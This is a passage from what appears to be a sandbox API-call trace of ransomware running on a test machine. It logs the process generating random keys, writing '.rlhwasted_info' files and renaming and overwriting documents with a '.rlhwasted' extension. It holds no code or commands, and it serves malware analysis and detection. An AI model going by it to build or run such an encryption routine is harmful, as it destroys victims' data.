CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\Nx6o.doc.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\nx6o.doc.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0189.683] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0189.685] SetEndOfFile (hFile=0x110) returned 1 [0189.685] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.685] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.685] lstrcpyW (in: lpString1=0x6ee4f4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.685] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\Nx6o.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\nx6o.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\Nx6o.doc.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\nx6o.doc.rlhwasted")) returned 1 [0189.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\Nx6o.doc.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\nx6o.doc.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0189.686] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0189.688] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0189.689] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.689] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.690] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0189.691] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0189.691] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.700] SetEndOfFile (hFile=0x110) returned 1 [0189.703] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.703] CloseHandle (hObject=0x110) returned 1 [0189.705] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0189.705] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0189.706] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0189.706] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.706] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\nyiiZlaHP.odp") returned 83 [0189.706] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b0) returned 0x70cfe8 [0189.706] lstrcpyW (in: lpString1=0x70d08e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.706] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.706] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0189.707] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.707] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\nyiiZlaHP.odp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\nyiizlahp.odp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0189.708] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0189.709] SetEndOfFile (hFile=0x110) returned 1 [0189.709] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.709] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.709] lstrcpyW (in: lpString1=0x70d08e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\nyiiZlaHP.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\nyiizlahp.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\nyiiZlaHP.odp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\nyiizlahp.odp.rlhwasted")) returned 1 [0189.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\nyiiZlaHP.odp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\nyiizlahp.odp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0189.710] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0189.711] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0189.712] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.712] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.712] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0189.713] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0189.713] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.771] SetEndOfFile (hFile=0x110) returned 1 [0189.846] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0189.846] CloseHandle (hObject=0x110) returned 1 [0189.848] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0189.848] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0189.849] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0189.850] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\swo96K7AoE.rtf") returned 84 [0189.850] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b2) returned 0x6ee458 [0189.850] lstrcpyW (in: lpString1=0x6ee500, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.850] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.850] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0189.851] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.851] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\swo96K7AoE.rtf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\swo96k7aoe.rtf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0189.895] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0189.896] SetEndOfFile (hFile=0x110) returned 1 [0189.896] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.896] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.896] lstrcpyW (in: lpString1=0x6ee500, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\swo96K7AoE.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\swo96k7aoe.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\swo96K7AoE.rtf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\swo96k7aoe.rtf.rlhwasted")) returned 1 [0189.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\swo96K7AoE.rtf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\swo96k7aoe.rtf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0189.898] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0189.901] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0189.902] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.902] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.902] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0189.903] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0189.903] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.914] SetEndOfFile (hFile=0x110) returned 1 [0189.917] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.917] CloseHandle (hObject=0x110) returned 1 [0189.919] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee458 | out: hHeap=0x6b0000) returned 1 [0189.919] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0189.920] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0189.920] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.920] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\zST upn.xlsx") returned 82 [0189.921] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ae) returned 0x70cfe8 [0189.921] lstrcpyW (in: lpString1=0x70d08c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.921] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.921] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0189.922] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.922] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\zST upn.xlsx.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\zst upn.xlsx.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0189.922] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0189.923] SetEndOfFile (hFile=0x110) returned 1 [0189.924] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.924] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.924] lstrcpyW (in: lpString1=0x70d08c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\zST upn.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\zst upn.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\zST upn.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\zst upn.xlsx.rlhwasted")) returned 1 [0189.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\zST upn.xlsx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\zst upn.xlsx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0189.925] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0189.958] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0189.959] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0189.959] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.959] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0189.960] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0189.960] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.971] SetEndOfFile (hFile=0x110) returned 1 [0189.974] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.974] CloseHandle (hObject=0x110) returned 1 [0189.975] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0189.976] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0189.977] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0189.977] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\EZBNKZgHezSTaL.rtf") returned 80 [0189.977] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0189.977] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.977] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.977] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0189.978] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.978] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\EZBNKZgHezSTaL.rtf.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\ezbnkzghezstal.rtf.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0190.149] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0190.151] SetEndOfFile (hFile=0x110) returned 1 [0190.151] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.151] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.151] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\EZBNKZgHezSTaL.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\ezbnkzghezstal.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\EZBNKZgHezSTaL.rtf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\ezbnkzghezstal.rtf.rlhwasted")) returned 1 [0190.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\EZBNKZgHezSTaL.rtf.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\ezbnkzghezstal.rtf.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0190.152] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0190.155] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0190.156] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0190.156] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.156] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0190.157] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0190.157] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.167] SetEndOfFile (hFile=0x110) returned 1 [0190.170] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.170] CloseHandle (hObject=0x110) returned 1 [0190.172] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0190.172] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0190.173] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0190.173] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\fYPfTvk VjBoEc.xls") returned 80 [0190.173] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0190.174] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.174] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0190.174] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0190.175] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.175] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\fYPfTvk VjBoEc.xls.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\fypftvk vjboec.xls.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0190.175] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0190.177] SetEndOfFile (hFile=0x110) returned 1 [0190.177] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.177] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.177] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\fYPfTvk VjBoEc.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\fypftvk vjboec.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\fYPfTvk VjBoEc.xls.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\fypftvk vjboec.xls.rlhwasted")) returned 1 [0190.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\fYPfTvk VjBoEc.xls.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js 